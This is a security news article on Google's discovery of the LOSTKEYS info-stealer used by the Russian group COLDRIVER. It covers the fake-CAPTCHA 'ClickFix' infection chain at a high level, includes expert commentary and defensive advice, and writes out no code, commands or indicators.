Google's Threat Intelligence Group (GTIG) has identified a new malware strain, dubbed "LOSTKEYS," attributed to the Russian state-sponsored hacking group COLDRIVER. The development marks a significant escalation in COLDRIVER's cyber espionage activities, which have traditionally focused on credential phishing.
Historically, COLDRIVER—also known as Star Blizzard, UNC4057, and Callisto—has targeted high-profile individuals and organizations, including NATO governments, NGOs, journalists, and former intelligence officers, primarily through credential phishing campaigns. The introduction of LOSTKEYS signifies a strategic shift towards deploying malware for direct data exfiltration.
"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," GTIG reported. The malware has been observed in campaigns as recent as April 2025, targeting advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine.
The infection process begins with a lure website featuring a fake CAPTCHA. Upon interacting with the CAPTCHA, users are prompted to execute a PowerShell command, initiating a multi-stage infection chain. Subsequent stages involve device checks to evade virtual environments and the retrieval of additional payloads, culminating in the deployment of the LOSTKEYS malware.
The method, known as "ClickFix," leverages social engineering to bypass traditional email-based defenses. "Users should exercise caution when encountering a site that prompts them to exit the browser and run commands on their device," GTIG advised.
The deployment of LOSTKEYS underscores the evolving threat landscape and the increasing sophistication of state-sponsored cyber espionage operations. Organizations, particularly those in the public sector, NGOs, and media, are advised to:
-
Implement strict access controls and least privilege policies
-
Educate users on recognizing and avoiding social engineering tactics
-
Regularly update and patch systems to mitigate vulnerabilities
-
Utilize advanced threat detection and response solutions
Col. Cedric Leighton, CNN Military Analyst; U.S. Air Force (Ret.); and Chairman, Cedric Leighton Associates, LLC, always has great insights into international threats. He said:
"COLDRIVER is definitely making a name for itself. A few thoughts:
- The introduction of a lure website with a false CAPTCHA element is an even more brazen attempt to capture target credentials and data than COLDRIVER's previously known efforts in which they ensnared targets with an "encrypted" PDF. Both efforts are extremely sophisticated and mean that regular cyber defenses are inadequate to these threats. Additionally, the cybersecurity training most people currently get does not come close to inoculating them from these attacks.
- Stepping back to examine the geopolitical implications of COLDRIVER's deployment of the LOSTKEYS malware, it seems clear that the Russian Federation continues to pursue a policy of convincing senior officials, journalists, and thought leaders in target countries to support—or at least not challenge—the Russian position on such issues as the war in Ukraine. Since Russia has difficulty prevailing on the kinetic battlefield, it is resorting to cyberattacks and influence operations to achieve its goals. Those goals include weakening NATO and setting the stage for an eventual takeover of Ukraine—even after sustaining significant battlefield losses.
- A key aspect of this operation also seems to be the exfiltration of sensitive data. Careless management of access to sensitive information by senior officials, as we see in the "Signalgate" scandal, only helps groups like COLDRIVER and their masters in Moscow.
- Destroying the effectiveness of our cyber defenses, as we see with personnel cuts at agencies like U.S. CISA and NSA, makes it much harder to combat a persistent foe like COLDRIVER."
"The threat posed by the complex LOSTKEYS infection is serious, especially as the Russian state-sponsored group COLDRIVER uses the software to attack high-profile political targets. Cybersecurity is national security, and must be prioritized as such by both the public and private sectors," said Darren Guccione, CEO and Co-Founder at Keeper Security. "When used for political purposes, cyberattacks and cyber espionage can be part of larger efforts to threaten operations, destabilize a government, or disrupt critical infrastructure such as power grids, transportation networks, and financial institutions. Certain malware can even be used to destroy evidence of network infiltration for purposes such as espionage."
"Nation-state adversaries are well-resourced and difficult to defend against, particularly when the adversary has an extensive network of hackers-for-hire executing their attacks on demand," Guccione added. "As such, fortifying global cybersecurity defenses against nation-state threats will require continued coordination between law enforcement, government agencies, and private sector organizations to provide the critical tools and insight necessary to defend digital borders and safeguard critical infrastructure."
GTIG has added the identified malicious domains and files to Google's Safe Browsing to protect users from further exploitation. Potential targets are encouraged to enroll in Google's Advanced Protection Program and enable Enhanced Safe Browsing in Chrome.
"The LOSTKEYS malware shows how attackers are getting smarter at tricking people and sneaking past basic security tools, especially by using fake websites and social engineering to get users to run harmful scripts," said J. Stephen Kowski, Field CTO at SlashNext Email Security+. "Defending against these kinds of threats means having security that can spot suspicious links, fake web pages, and hidden malware in real time, even when attackers use new tricks or try to hide their tracks. It's also important to block dangerous sites and files before users ever reach them, and to catch threats that might slip through email, websites, or messaging apps. Combining these protections with good end-user awareness can help stop even the most creative attacks before they cause any harm."
VJ Viswanathan, Founding Partner at CYFORIX (Former CISO & Sr. Executive at Keurig Dr Pepper, Comcast, HD Supply, and GE), said he debriefed a community of CISOs on this very issue on the afternoon of May 8th:
"Malware-as-a-service is a thriving market particularly fueled by info-stealer malware variants. 'LOSTKEYS' is a Visual Basic Script (VBS) info-stealer malware recently observed in campaigns attributed to COLDRIVER. This malware is designed to steal files from specific directories and with specific file extensions, as well as collect system information and running processes. Its delivery mechanism often involves a multi-stage infection chain starting with a fake CAPTCHA website, socially engineering users into executing malicious PowerShell commands."
"COLDRIVER is a sophisticated threat group believed to be linked to Russian state interests (FSB); COLDRIVER was primarily known for its persistent and highly targeted credential phishing campaigns against high-profile individuals and organizations, including NATO governments, NGOs, journalists, and think tanks," Viswanathan continued. "Their historical TTPs involved creating convincing impersonation accounts and using cloud storage services to host malicious files or links leading to phishing pages. More recently, COLDRIVER has shown an evolution in its capabilities, moving beyond just credential theft to deploy custom malware like SPICA (observed in 2023-2024) and now LOSTKEYS (observed in 2025). This indicates a shift towards gaining more persistent access to target systems and exfiltrating sensitive documents and system information directly, in addition to their ongoing credential harvesting activities. Their targeting continues to focus on individuals and entities relevant to Russia's strategic interests, particularly those connected to Western governments and Ukraine."
Viswanathan added, "In addition to user awareness training to spot social engineering attacks, implement safeguards to prevent browser synchronization to separate enterprise and personal access. Continue to actively monitor and update EDR and implement advanced Identity and Access management controls while conducting periodic threat hunting for correlation events."
GTIG noted, but is not certain, if this new malware is related to a late 2023 vector:
"As part of the investigation into this activity, we discovered two additional samples, hashes of which are available in the Indicators of Compromise section, dating back as early as December 2023. In each case, the samples end up executing LOSTKEYS but are distinctly different from the execution chain mentioned here in that they are Portable Executable (PE) files pretending to be related to the software package Maltego.
It is currently unclear if these samples from December 2023 are related to COLDRIVER, or if the malware was repurposed from a different developer or operation into the activity seen starting in January 2025."
For more detailed information and technical indicators of the latest compromise, refer to the full GTIG report.
